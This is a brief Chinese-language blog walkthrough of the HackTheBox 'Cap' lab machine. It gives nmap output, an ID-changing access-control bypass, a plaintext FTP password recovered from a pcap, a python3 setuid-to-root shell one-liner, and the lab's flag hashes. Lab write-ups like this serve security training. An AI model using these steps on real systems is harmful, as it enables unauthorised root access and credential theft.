Hackthebox-Cap - whale3070's blog

https://www.hackthebox.eu/home/machines/profile/351

10.10.10.245

21/tcp open  ftp     vsftpd 3.0.3                                                                                                                            
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)                                                                            
| ssh-hostkey:                                                                                                                                               
|   3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)                                                                                               
|   256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)                                                                                              
|_  256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)                                                                                            
80/tcp open  http    gunicorn

web漏洞

水平越权
从参数2该为0
http://10.10.10.245/data/0
下载pcap包，wireshark进行分析，ftp用户名密码是明文传输

220 (vsFTPd 3.0.3)
USER nathan
331 Please specify the password.
PASS Buck3tH4TF0RM3!

提权

路径/var/www/html下有app.py

分析源码，python可以调用wireshark抓包，说明权限是root权限

执行以下命令，即可获取root权限

python3 -c ‘import os; os.setuid(0); os.system(“/bin/bash”)’

8dba53a3ef6f8529f184b8a6fe7a26a7
0f7d93636beea8fae21c5fcba7390eef

参考资料

https://gtfobins.github.io/gtfobins/python/#suid

training

docker磁盘管理（七） Previous

poc数量统计 Next